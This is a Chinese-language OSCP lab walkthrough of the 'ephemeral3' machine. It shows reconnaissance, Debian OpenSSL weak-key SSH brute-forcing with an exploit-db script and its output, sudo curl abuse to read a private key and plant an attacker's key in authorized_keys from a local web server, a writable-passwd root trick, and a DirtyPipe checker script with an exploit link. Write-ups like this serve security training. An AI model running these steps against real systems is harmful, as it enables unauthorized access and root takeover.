OSCP 靶场
靶场介绍
ephemeral3 |
easy |
OpenSSL SSH 漏洞利用、sudo—curl提权、CVE-2022-0847提权、passwd 写入 |
信息收集
主机发现
nmap -sn 192.168.1.0/24
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.69
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-01 02:51 EST
Nmap scan report for 192.168.1.69
Host is up (0.0023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 f0:f2:b8:e0:da:41:9b:96:3b:b6:2b:98:95:4c:67:60 (RSA)
| 256 a8:cd:e7:a7:0e:ce:62:86:35:96:02:43:9e:3e:9a:80 (ECDSA)
|_ 256 14:a7:57:a9:09:1a:7e:7e:ce:1e:91:f3:b1:1d:1b:fd (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:83:2D:83 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 2.30 ms 192.168.1.69
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.30 seconds
目录扫描
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.69 -x html,txt,php -e
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.69/agency -x html,txt,php -e
权限获取
通过上面的提示,使用searchsplit 找到opensll ssh 漏洞。或者从漏洞库里面查找
https://www.exploit-db.com/exploits/5720
查看脚本使用条件,需要先下载如下文件
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
我们还需要找到ssh 的用户名字,从提示文件和网站中找个几个名字分别进行测试
if len(sys.argv) < 4:
print './exploit.py <dir> <host> <user> [[port] [threads]]'
print ' <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash'
print ' <host>: The victim host'
print ' <user>: The user of the victim host'
print ' [port]: The SSH port of the victim host (default 22)'
print ' [threads]: Number of threads (default 4) Too big numer is bad'
└─# python2 5720.py ./rsa/2048 192.168.1.69 randy 22 5
-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
Tested 210 keys | Remaining 32558 keys | Aprox. Speed 42/sec
Tested 412 keys | Remaining 32356 keys | Aprox. Speed 40/sec
Tested 623 keys | Remaining 32145 keys | Aprox. Speed 42/sec
Tested 828 keys | Remaining 31940 keys | Aprox. Speed 41/sec
Tested 1031 keys | Remaining 31737 keys | Aprox. Speed 40/sec
Tested 1240 keys | Remaining 31528 keys | Aprox. Speed 41/sec
Tested 1475 keys | Remaining 31293 keys | Aprox. Speed 47/sec
Tested 1682 keys | Remaining 31086 keys | Aprox. Speed 41/sec
Tested 1895 keys | Remaining 30873 keys | Aprox. Speed 42/sec
Tested 2101 keys | Remaining 30667 keys | Aprox. Speed 41/sec
Tested 2307 keys | Remaining 30461 keys | Aprox. Speed 41/sec
Tested 2518 keys | Remaining 30250 keys | Aprox. Speed 42/sec
Tested 2729 keys | Remaining 30039 keys | Aprox. Speed 42/sec
Tested 2948 keys | Remaining 29820 keys | Aprox. Speed 43/sec
Tested 3146 keys | Remaining 29622 keys | Aprox. Speed 39/sec
Tested 3370 keys | Remaining 29398 keys | Aprox. Speed 44/sec
Tested 3565 keys | Remaining 29203 keys | Aprox. Speed 39/sec
Tested 3786 keys | Remaining 28982 keys | Aprox. Speed 44/sec
Tested 4002 keys | Remaining 28766 keys | Aprox. Speed 43/sec
Tested 4218 keys | Remaining 28550 keys | Aprox. Speed 43/sec
Tested 4430 keys | Remaining 28338 keys | Aprox. Speed 42/sec
Tested 4645 keys | Remaining 28123 keys | Aprox. Speed 43/sec
Tested 4850 keys | Remaining 27918 keys | Aprox. Speed 41/sec
Tested 5059 keys | Remaining 27709 keys | Aprox. Speed 41/sec
Tested 5254 keys | Remaining 27514 keys | Aprox. Speed 39/sec
Tested 5458 keys | Remaining 27310 keys | Aprox. Speed 40/sec
Tested 5663 keys | Remaining 27105 keys | Aprox. Speed 41/sec
Tested 5866 keys | Remaining 26902 keys | Aprox. Speed 40/sec
Tested 6083 keys | Remaining 26685 keys | Aprox. Speed 43/sec
Tested 6278 keys | Remaining 26490 keys | Aprox. Speed 39/sec
Tested 6480 keys | Remaining 26288 keys | Aprox. Speed 40/sec
Tested 6704 keys | Remaining 26064 keys | Aprox. Speed 44/sec
Tested 6940 keys | Remaining 25828 keys | Aprox. Speed 47/sec
Tested 7147 keys | Remaining 25621 keys | Aprox. Speed 41/sec
Tested 7347 keys | Remaining 25421 keys | Aprox. Speed 40/sec
Tested 7544 keys | Remaining 25224 keys | Aprox. Speed 39/sec
Tested 7751 keys | Remaining 25017 keys | Aprox. Speed 41/sec
Tested 7951 keys | Remaining 24817 keys | Aprox. Speed 40/sec
Tested 8148 keys | Remaining 24620 keys | Aprox. Speed 39/sec
Tested 8349 keys | Remaining 24419 keys | Aprox. Speed 40/sec
Tested 8570 keys | Remaining 24198 keys | Aprox. Speed 44/sec
Tested 8788 keys | Remaining 23980 keys | Aprox. Speed 43/sec
Tested 9000 keys | Remaining 23768 keys | Aprox. Speed 42/sec
Tested 9226 keys | Remaining 23542 keys | Aprox. Speed 45/sec
Tested 9449 keys | Remaining 23319 keys | Aprox. Speed 44/sec
Tested 9675 keys | Remaining 23093 keys | Aprox. Speed 45/sec
Tested 9889 keys | Remaining 22879 keys | Aprox. Speed 42/sec
Tested 10110 keys | Remaining 22658 keys | Aprox. Speed 44/sec
Tested 10322 keys | Remaining 22446 keys | Aprox. Speed 42/sec
Key Found in file: 0028ca6d22c68ed0a1e3f6f79573100a-31671
Execute: ssh -lrandy -p22 -i ./rsa/2048/0028ca6d22c68ed0a1e3f6f79573100a-31671 192.168.1.69
Tested 10500 keys | Remaining 22268 keys | Aprox. Speed 35/sec
通过exp,获取ssh keys,然后成功登录获取权限
ssh -lrandy -p22 -i ./rsa/2048/0028ca6d22c68ed0a1e3f6f79573100a-31671 192.168.1.69
权限提升
randy@ephemeral:~$ sudo -l
Matching Defaults entries for randy on ephemeral:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User randy may run the following commands on ephemeral:
(henry) NOPASSWD: /usr/bin/curl
https://gtfobins.github.io/gtfobins/curl/
尝试使用如下命令读取henry 用户的私钥,但是失败了。
randy@ephemeral:/home/henry$ LFILE=/home/henry/.ssh/id_rsa
randy@ephemeral:/home/henry$ sudo -u henry curl file://$LFILE
我们在kali 上生成公钥,然后通过curl 命令下载到henry 用户的ssh 目录下
ssh-keygen -b 4096 -t rsa
cd .ssh
使用php开启web服务
php -S 0.0.0.0:12345
sudo -u henry /usr/bin/curl 192.168.1.103:12345/id_rsa.pub -o /home/henry/.ssh/authorized_keys
下载成功后,我们在kali 上使用私钥登录成功
linpeas.sh 扫描发现passwd 可写入,那么我们直接写入root权限用户
补充
使用CVE-2022-0847-DirtyPipe 漏洞进行提权,首先我们可以使用linpeas.sh 扫描,或者使用如下的脚本进行测试
https://raw.githubusercontent.com/basharkey/CVE-2022-0847-dirty-pipe-checker/main/dpip.sh
#!/bin/bash
# usage
# Check current kernel ./dpipe.sh
# Check specific kernel ./dpipe.sh 5.10.102
kernel=$1
ver1=$(echo ${kernel:-$(uname -r | cut -d '-' -f1)} | cut -d '.' -f1)
ver2=$(echo ${kernel:-$(uname -r | cut -d '-' -f1)} | cut -d '.' -f2)
ver3=$(echo ${kernel:-$(uname -r | cut -d '-' -f1)} | cut -d '.' -f3)
echo $ver1 $ver2 $ver3
if (( ${ver1:-0} < 5 )) ||
(( ${ver1:-0} > 5 )) ||
(( ${ver1:-0} == 5 && ${ver2:-0} < 8 )) ||
(( ${ver1:-0} == 5 && ${ver2:-0} == 10 && ${ver3:-0} == 102 )) ||
(( ${ver1:-0} == 5 && ${ver2:-0} == 10 && ${ver3:-0} == 92 )) ||
(( ${ver1:-0} == 5 && ${ver2:-0} == 15 && ${ver3:-0} == 25 )) ||
(( ${ver1:-0} == 5 && ${ver2:-0} >= 16 && ${ver3:-0} >= 11 )) ||
(( ${ver1:-0} == 5 && ${ver2:-0} > 16 ));
then
echo Not vulnerable
exit 0
else
echo Vulnerable
exit 1
fi
如果漏洞存在,我们可以使用如下exp 进行提权
https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】ephemeral3
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论